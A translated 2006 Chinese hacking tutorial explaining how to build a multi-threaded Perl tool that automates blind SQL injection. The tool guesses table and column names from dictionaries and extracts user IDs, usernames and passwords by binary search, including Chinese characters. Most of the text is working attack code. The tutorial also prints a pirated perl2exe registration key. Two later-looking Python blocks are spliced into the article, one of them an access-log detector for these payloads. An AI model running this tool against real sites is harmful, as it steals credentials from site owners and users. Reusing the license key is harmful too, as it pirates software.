Building a multi-threaded SQL injection auto-guesser with Chinese cracking support in PERL

MYHACK58:6220067164
Feb 16, 2006
佚名 (Anonymous)
www.myhack58.com

Speaking of SQL injection tools, from Doll's (娃娃) dvTxt.pl for the Dongwang (动网) article system to Stinky Beggar's (臭要饭的) Peerless Guesser CSC and NB Alliance's NBSI, who hasn't used them?
The original ancestor, dvTxt.pl, has been modified who knows how many times to work against all sorts of systems with SQL injection vulnerabilities; typically, whenever Hacker Defense (黑客防线) runs an article about a system with an SQL injection hole, this old Buddha is carried out again, a few fields are changed, and yet another killer tool is born! As for Stinky Beggar's Peerless Guesser CSC, I used to think it was already good enough: it does use multithreading, but it still suffers from having no real algorithm; cracking relies on a dictionary, which is not only slow but also rules out cracking double-byte characters such as Chinese. NBSI improved the cracking algorithm but dropped multithreading, and guessing table names and column names shares one large dictionary, which wastes a lot of time. Combining the two would be ideal, but without the source code and the Visual development tools, what can one do with VB alone? I don't even know which language the masters wrote them in, and even if it were VB nobody is willing to release the source. Helpless... I could only answer the Chairman's call: do it yourself, and you will be well fed and clothed!
The program merely turns manual into automatic, so first let me painfully recall the manual injection-guessing process: 1. find the injection point -> 2. construct the SQL query -> 3. submit the URL -> 4. judge from what the browser returns whether the SQL query was correct -> 5. adjust the SQL query -> 6. repeat steps 3, 4 and 5 N times until the correct information stored in the database is obtained.
Translated into program terms: 1. input the URL $url that has the SQL injection vulnerability -> 2. extract the host $host, path $path and port $port from the URL -> 3. append the constructed SQL query to the URL $url -> 4. submit the URL to the target host with IO::Socket -> 5. extract from the returned page the string $info that shows whether the query logic was true or false; on success move on to guessing the next target value, on failure keep repeating steps 3, 4 and 5.
The overall flow of the guessing is as follows:
User information table -> user name field -> password field -> ID field -> minimum user ID -> user name length -> password length -> user name -> password
That was a bit minimalist, but these things are really well known by now; for more detail see the SQL injection special topic in Hacker Defense issue 5. Theory done; everyone is itching to go, sabres rattling...
LET'S GO!!!
I. Extract the host $host, path $path and port $port from $url
Remember Doll's dvTxt.pl and its cumbersome usage, dvTxt.pl <host> <path> <articleID> <errInfo>? The three parts of one $URL are a family forced to live apart!
Copying and pasting them in is extremely inconvenient, yet with Perl's powerful regular expressions it is easily solved. First casually observe a few URLs: http://www.hemon.tk/show.asp?id=957, http://www.hemon.tk:1314/show.asp?id=957 and http://www.hemon.tk/article/show.asp?id=957. Looking through the phenomenon to the essence, the rule emerges: (http://)host(:port)/path, where each part in parentheses appears 0 or 1 times.
The regular expression is therefore:

Program code: $port=80;   # default when the URL gives no port
if($url=~/(http:\/\/)?(.+?)\/(.+)/)
{
    $host=$2;
    $path='/'.$3;
    if($host=~/(.+):(.+)/)
    {
        $host=$1;
        $port=$2;
    }
}

In "$url=~/(http:\/\/)?(.+?)\/(.+)/", first the question mark: "?" matches the preceding item 0 or 1 times, so the leading http:// in the input link is optional. The host $host is matched by (.+?); why not (.+)? Because Perl is greedy by default and matches as many characters as possible up to the following "/", so without that restriction a URL such as http://www.hemon.tk/article/show.asp?id=957 would give $host = www.hemon.tk/article rather than the www.hemon.tk we want.
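The greedy-versus-non-greedy point above is easy to check in Python's re module. The block below is an added example and not part of the original article (whose code is Perl): split_url() applies the article's pattern with the scheme and ":port" each optional, and greedy_host() reproduces the mistake the text warns about. The three URLs are the ones quoted above; the default_port of 80 is an assumption for URLs that give no port.

```python
import re

# The three URL shapes quoted above (the article's own examples); scheme and ":port"
# are each optional, which is the "0 or 1 times" rule the text derives.
URL_RE = re.compile(r"^(?:https?://)?(?P<host>.+?)(?::(?P<port>\d+))?/(?P<path>.*)$")


def split_url(url, default_port=80):
    """Return (host, port, path). host uses the non-greedy (.+?) so it stops at the first '/'.
    default_port is an assumption for URLs that carry no explicit port."""
    m = URL_RE.match(url)
    if m is None:
        raise ValueError("no host/path structure in %r" % url)
    port = int(m.group("port")) if m.group("port") else default_port
    return m.group("host"), port, "/" + m.group("path")


def greedy_host(url):
    """The mistake the text warns about: greedy (.+) runs to the LAST '/', so the host swallows the path."""
    m = re.match(r"^(?:https?://)?(.+)/(.+)$", url)
    return m.group(1) if m else None


if __name__ == "__main__":
    for u in ("http://www.hemon.tk/show.asp?id=957",
              "http://www.hemon.tk:1314/show.asp?id=957",
              "http://www.hemon.tk/article/show.asp?id=957"):
        print(split_url(u), "greedy host would be:", greedy_host(u))
```

Like the article's regex, split_url() requires a "/" after the host, so a bare "http://www.hemon.tk" raises ValueError rather than silently returning an empty path.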
II. The IO::Socket submit function
After the earlier effort it is payback time: with the extracted host $host, path $path and port $port we can quickly write the submit function:

Code: use IO::Socket;   # needed for IO::Socket::INET below

sub connect
{
    $req = "GET $path$path1 HTTP/1.0\n".
           "Host: $host\n".
           "Referer: $host\n".
           "Cookie: \n\n";

    my $connection = IO::Socket::INET->new(Proto => "tcp",
                                           PeerAddr => $host,
                                           PeerPort => $port) || die "Sorry! Could not connect to $host \n";
    print $connection $req;
    my @res = <$connection>;
    close $connection;
    return @res;
}

The connect subroutine returns the response in the array @res.
III. Guess the user information table
SQL query statement used: 0<>(select count(*) from TABLE)
The real cracking starts here, and there is no shortcut: read the table names from the dictionary in order and try them one by one, and as soon as one matches the success string, exit the while loop. There are two kinds of dictionary, an array and a text file; since the Perl script will be compiled into an EXE, to make it easy to add new table names later I use a text dictionary file:

Program code: open (tabInput,"table.txt") or die "can't open file!\n";
while (chomp(my $input=<tabInput>))
{
    my $sql="0<>(select%20count(*)%20from%20$input)";
    $path1 = "%20AND%20$sql";
    &url;   # sub url is not shown in the article
    @res = &connect;
    if ("@res"=~/$info/)
    {
        $table_User=$input;
        print "the table of userinfo is:$table_User\n";
        last;
    }
}
close(tabInput);

IV. Guess the field names
SQL query statement used: exists (select COL_NAME from TABLE)
This step is exactly the same as guessing the table name. Once the table name is obtained we split into three and go straight for the user name column $field_Username, the password column $field_Password and the ID column $field_ID; and since the troops are split, we have to use Perl multithreading. Oh, you haven't tried it?
To prepare for the multithreading, first write the guessing subroutine; we still use a text dictionary file, passing the file name as the only argument:

Program code: sub field_input
{
    my $field;
    open (fieInput,"$_[0]") or die "can't open file!\n";
    while (chomp(my $input=<fieInput>))
    {
        my $sql="exists%20(select%20$input%20from%20$table_User)";
        $path1 = "%20AND%20$sql";
        my @res = &connect;
        if ("@res"=~/$info/)
        {
            $field=$input;
            print "\t+- $field --+";
            last;
        }
    }
    close(fieInput);
    return $field;
}

V. A crash course in Perl multithreading
And then, of course, comes learning Perl multithreading!!! Perhaps you are already trembling at how grand that sounds, but the 80/20 rule works wonders here: we only need to learn two functions to finish our crash course:
$thread = threads->create(FUNCTION, LIST)
Creates a thread that runs the subroutine FUNCTION and stores it in the variable $thread; LIST is the parameter list passed to the subroutine; create can be replaced with new.
$thread->join
Waits for the thread to finish. Once it has ended, join() returns the return value of the subroutine FUNCTION.
THAT'S ALL!
Is it really that simple?? Yes, these two choppers are enough to carry out our revolution!!!
For details see the ActivePerl help document: Perl/html/lib/threads.html.
5, 4, 3, 2, 1, ignition!

Program code: use threads;   # needed for threads->create and join
$thread1 = threads->create("field_input","field_Username.txt");
$thread2 = threads->create("field_input","field_Password.txt");
$thread3 = threads->create("field_input","field_ID.txt");

Collecting the return values:

Program code: $field_Username = $thread1->join();
$field_Password = $thread2->join();
$field_ID = $thread3->join();

Three threads launched at once and then joined back: what a perfect landing, 10 points!!!
VI. Number guessing tricks
More horses are no use if they don't run; the cart's wheels still won't turn. So let's study the guessing technique. Step back and look at the tasks still waiting for us: minimum user ID -> user name length -> password length -> user name -> password.
The ID is a natural number, the length length($field) is a number, and the characters of a user name or password are ASCII code values. Have you ever played one of those JavaScript number-guessing games online? Guess a number below 100, and why do they give you only 7 chances? Because 2^7 = 128: in other words, a number below 128 needs only 7 guesses. So how many guesses for those prizes worth thousands or tens of thousands on Li Yong's show? 2^13 = 8192, 2^14 = 16384; still worried about not winning?!
To make it clearer, take guessing a number of 8 or less, say 5; the steps are as follows:
? < 4 ? N (start at 4)
? < 6 ? Y (4 + 2 = 6)
? < 5 ? N (6 - 1 = 5)
? = 5
It still took three tries: start from the midpoint 4, and each guess adds or subtracts half of the previous step, 2 then 1. The powers of two are fixed, so to save the CPU from recomputing them I prepared one array for each range of values to be guessed, four in all:

Program code: @dic1=(128,64,32,16,8,4,2,1); # the minimum user ID
@dic2=(16,8,4,2,1); # the username, password length
@dic3=(64,32,16,8,4,2,1); # English characters
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); #Chinese character

The algorithm subroutine is as follows:
sub crack
{
    my(@dic) = @_;
    my $sql=pop(@dic);
    my $i=0;
    my $op=1;
    my $crack=0;
    foreach my $pass(@dic)
    {
        print ">";
        $i++;
        $crack+=$op*$pass;
        $path1 = "%20AND%20$crack<($sql)";
        my @res = &connect;
        if ("@res" =~ /$info/)
        {
            $op=1;
            if($i==@dic)
            {
                $crack++;
            }
        }
        else
        {
            $op=-1;
        }
    }
    return $crack;
}

$sql="select%20min($field_ID)%20from%20$table_User";
$id=&crack(@dic1,"$sql");

Pass in the constructed SQL injection statement and the matching dictionary array, and CRACK it!!!
Because the parameter is an array, the subroutine simply assigns it with my(@dic) = @_ and not my(@dic,$sql) = @_; in the latter form $sql would always be empty! A scalar and an array can be passed together, with $sql here being the last element of @dic. pop(@dic) then removes that last element and returns it as $sql, and what remains in @dic is pure numbers.
Let's bang on: take the user name length and the password length at the same time, and don't forget to use multithreading:

Program code: $sql="select%20len($field_Username)%20from%20$table_User%20where%20$field_ID=$id";
my $thread4 = threads->create("crack",@dic2,$sql);
$sql="select%20len($field_Password)%20from%20$table_User%20where%20$field_ID=$id";
my $thread5 = threads->create("crack",@dic2,$sql);
$userlen = $thread4->join();
$passlen = $thread5->join();

VII. The final battle: cracking the field values
SQL query statement used: select abs(asc(mid($field_Username,$locat,1))) from $table_User where $field_ID = $id
I won't discuss guessing against MS-SQL here; for MS-SQL there is no need to guess at all: as long as you construct the conditions well enough, you can make the other side display the data content directly in its error message.
Character guessing against ACCESS: first determine whether the ASCII code value is greater than zero; if greater, pass @dic3 into the CRACK function, if less, use @dic4! After the function returns the value, for English characters there are two methods, nchar($asc) or pack('C*',$asc); for Chinese characters: open the calculator, choose scientific mode, convert to hex one character at a time, then edit it in UltraEdit character by character, haha... that is not called programming!
First use sprintf("%X",$asc) to do the calculator's hex conversion, and don't forget to use a regular expression to pull out the last four digits, otherwise each character comes with two extra bytes in front; then use pack("H*",$str) to do UltraEdit's packing job:

Program code: sub asc
{
    my $asc=$_[0];
    my $str;
    if ($asc<256)
    {
        $str = pack('C*',$asc);
    }
    else
    {
        $asc*=-1;
        $str = sprintf("%X",$asc);
        if ($str=~/(.{4})$/i)
        {
            $str=$1;
        }
        $str = pack("H*",$str);
    }
    return $str;
}

Everything is ready but the east wind: all that is left is to guess the code values and decode them. For example, start a CRACK sub-thread for each character of the password:

Program code: for (my $locat=1;$locat<=$passlen;$locat++)
{
    $sql = "select%20asc(mid($field_Password,$locat,1))%20from%20$table_User%20where%20$field_ID=$id";
    $path1 = "%20AND%200>($sql)";
    my @res = &connect;
    if ("@res" =~ /$info/)
    {
        $sql = "select%20abs(asc(mid($field_Password,$locat,1)))%20from%20$table_User%20where%20$field_ID=$id";
        $password[$locat] = threads->create("crack",@dic4,$sql);
    }
    else
    {
        $password[$locat] = threads->create("crack",@dic3,$sql);
    }
}

Then wait patiently for these kids to come home one by one:

Program code: for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = $password[$locat]->join();
}
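From the defender's side, every stage described above (table-name dictionary, column-name dictionary, numeric bisection, the sign test and character bisection) leaves a recognisable shape in the web server's access log, and the bisection stages produce a burst of near-identical requests from one client against one path. The following Python script is an added example and not part of the article: it parses Common Log Format lines, URL-decodes the request, classifies each request by probe shape, and flags clients that send more than a few such probes. The log lines and the min_probes threshold of 3 are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); these lines are made up for the example.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Feb/2006:00:00:01 +0800] "GET /show.asp?id=957%20AND%200<>(select%20count(*)%20from%20admin) HTTP/1.0" 200 5120
10.0.0.5 - - [16/Feb/2006:00:00:02 +0800] "GET /show.asp?id=957%20AND%20exists%20(select%20username%20from%20admin) HTTP/1.0" 200 5120
10.0.0.5 - - [16/Feb/2006:00:00:03 +0800] "GET /show.asp?id=957%20AND%20128<(select%20min(id)%20from%20admin) HTTP/1.0" 200 312
10.0.0.5 - - [16/Feb/2006:00:00:04 +0800] "GET /show.asp?id=957%20AND%200>(select%20asc(mid(password,1,1))%20from%20admin%20where%20id=1) HTTP/1.0" 200 312
10.0.0.5 - - [16/Feb/2006:00:00:05 +0800] "GET /show.asp?id=957%20AND%2064<(select%20abs(asc(mid(password,1,1)))%20from%20admin%20where%20id=1) HTTP/1.0" 200 5120
192.168.1.20 - - [16/Feb/2006:00:00:06 +0800] "GET /show.asp?id=957 HTTP/1.0" 200 5120
192.168.1.20 - - [16/Feb/2006:00:00:07 +0800] "GET /list.asp?page=2 HTTP/1.0" 200 2048
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Probe shapes, one per stage of the article's tool, matched against the decoded,
# lower-cased, whitespace-collapsed request. Order matters: the character
# bisection test is checked before the generic numeric one.
PROBES = [
    ("table-guess",    re.compile(r" and 0<>\(select count\(\*\) from ")),
    ("column-guess",   re.compile(r" and exists ?\(select \w+ from ")),
    ("char-sign",      re.compile(r" and 0>\(select asc\(mid\(")),
    ("char-bisect",    re.compile(r" and \d+<\(select (?:abs\()?asc\(mid\(")),
    ("numeric-bisect", re.compile(r" and \d+<\(select (?:min|len)\(")),
]


def parse_clf(line):
    """Split one Common Log Format line into its fields, or return None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def normalize(url):
    """Decode %XX escapes, lower-case, and collapse whitespace so encoding does not hide the shape."""
    return re.sub(r"\s+", " ", unquote(url)).lower()


def classify_request(url):
    """Return the probe stage label for a request, or None for a request with no probe shape."""
    text = normalize(url)
    for label, pattern in PROBES:
        if pattern.search(text):
            return label
    return None


def summarize(log_text):
    """Per client IP: total requests, probe-shaped requests, and the set of stages seen."""
    stats = defaultdict(lambda: {"requests": 0, "probes": 0, "phases": set()})
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        entry = stats[rec["ip"]]
        entry["requests"] += 1
        label = classify_request(rec["url"])
        if label is not None:
            entry["probes"] += 1
            entry["phases"].add(label)
    return dict(stats)


def flag_clients(log_text, min_probes=3):
    """IPs that sent at least min_probes probe-shaped requests (threshold chosen for the example)."""
    return sorted(ip for ip, s in summarize(log_text).items() if s["probes"] >= min_probes)


if __name__ == "__main__":
    for ip, s in summarize(SAMPLE_LOG).items():
        print(ip, s["requests"], s["probes"], sorted(s["phases"]))
    print("flagged:", flag_clients(SAMPLE_LOG))
```

On a real server the volume is the strongest signal: with @dic4 each Chinese character costs up to 15 requests, all to the same path from the same client, and the response sizes alternate between the normal page and the error page (5120 versus 312 in the constructed lines) as the true/false oracle flips. The regexes here only cover the exact shapes the article builds; a production rule set would also normalise comments and alternative whitespace encodings before matching.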

Other display details I won't bother to describe; hurry on to compiling the EXE. GO!
VIII. Compile the Perl to an EXE
From perl2exe's home page http://www.indigostar.com/perl2exe.htm download the latest Perl2Exe for Win32, currently 8.40; unzip it, open a CMD command line, enter the unzipped directory, and to avoid the annoying nag ads first register the software:

Program code: D:\hemon\software>perl2exe -register
Perl2Exe V8.40 Copyright © 1997-2004 IndigoSTAR Software
Please enter your registration key, or press enter to cancel

Enter my registration code:
hemon:hemon:20040709,36713
After successful registration it shows:
Registered
At the same time a registration file named perl2exe.key is generated in the program directory; don't move it, ah!
Compile the PL:

Program code: D:\hemon\software>perl2exe si.pl
Perl2Exe V8.40 Copyright © 1997-2004 IndigoSTAR Software
Registered to hemon:hemon:20040709, The ENT version
Converting 'si.pl' to si.exe

A multithreaded, Chinese-capable Perl injector is born!!!
It roughly doubles the speed, that is, it saves half the time, and I expect there is still plenty of room for improvement. The catch is the old saying "haste makes waste": for websites with slower connections I have provided two versions, thr.pl and sig.pl; which one to use, you know, I don't tell ordinary people! It is best to just use the single-threaded one, for good stability.
But with the code in hand, I'm afraid you will change it anyway: improve the stability, add a few functions to support PHP+MySQL, ASP+MSSQL and so on...
In a phrase: the network gathers people's power! Support releasing source code!